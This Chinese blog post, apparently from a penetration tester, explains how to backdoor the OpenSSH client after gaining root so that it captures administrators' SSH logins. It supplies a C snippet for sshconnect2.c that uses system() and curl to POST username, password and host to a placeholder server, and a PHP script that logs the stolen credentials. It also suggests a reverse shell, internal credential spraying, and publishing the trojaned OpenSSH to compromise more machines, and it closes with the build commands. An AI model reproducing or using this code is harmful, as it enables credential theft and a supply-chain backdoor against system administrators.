• 利用OPENSSH自身记录密码


    大家都知道,OPENSSH是基于Linux下,一款开源,安全性不错的Linux SSH会话连接工具。

    在渗透当中,当我们get root了。我们如何来记录Linux管理员登陆过的SSH?

    想法如下:

    1:更改OPENSSH源代码,记录到某个地方。

    2:在更改源代码的前提下,将OPENSSH 记录到的账户密码POST/GET/传输到某个地方。

    3:更改OPENSSH源代码,对内网进行扫描。将获得的账户密码,在Linux机器OPENSSH连接进行比对。如果成功就发送,如果失败就PASS。

    4:如何获得更多的Linux肉鸡? 更改OPENSSH源代码,写成后门,然后发布。

    测试中截图如下:

    我们分析OPENSSH连接过程,然后找到可更改代码的地方,截取USERNAME和PASSWORD:

    之后我们重新编译OPENSSH,事前需要看好版本,不过一般管理员对OPENSSH版本不会重视把?

    如果管理员连接的OPENSSH:

    我们将记录到密码。

    -----------------------------------------------------------------------

    如果你觉得这样达不到你的目的。

    咱们可以加个反向连接shell,管理员每次一连接,就反向到你那儿去。或者一直把shell 反向都处于连接的状态。

    ------------------------------------------------------------------

    也可以直接CURL到咱们的地方。

    接受:

     

    <?php
    $username = $_POST['username'];
    $password = $_POST['password'];
    $host = $_POST['Host'];
    
    if(isset($username) != "" || isset($password) !="" || isset($host) != "")
    {
            $fp = fopen("log.txt","a+");
            $result = "Username:.$username--->:Password:$password----->:Host:$host";
            fwrite($fp,$result);
            fwrite($fp,"
    ");
            fclose($fp);
    }
    ?>

    POST:

            char szres[1024] = {0};
            memset(szres,0,sizeof(szres));
            snprintf(szres,sizeof(szres),"/usr/bin/curl -s -d "userName=%s&password=%s&Host=%s" http://xxxxxx/xx.php >null",options.user,pass,get_remote_ipaddr());
            printf("Szres = %s.
    ",szres);
            system(szres);
            

    写的很仓促,代码路径这块没有经过判断之类的。毕竟我是以渗透出路的,代码写的很烂,还请见谅。

    大概具体就是这样了,如果你觉得你已经知道了这个方法,或者你根本用不到。还请别打我。

    刚才忘记说了,更改文件代码的文件名字是:

    sshconnect2.c  //只要有认证的地方都可以改。

    编译SSH命令如下:


    ./configure --prefix=/usr --sysconfdir=/etc/ssh

    make ; make install

    然后直接SSH命令用即可。

  • 相关阅读:
    安装HDP时的报错信息
    K-近邻(KNN)算法
    linux复杂命令
    azkaban报错记录
    azkaban的安装部署
    安装centOS后要解决的问题
    AI之微信跳一跳
    Python的lambda
    关于在vim中的查找和替换
    cdh6.3.2 hue集成hbase
  • 原文地址:https://www.cnblogs.com/killbit/p/5101928.html
Copyright © 2020-2023  润新知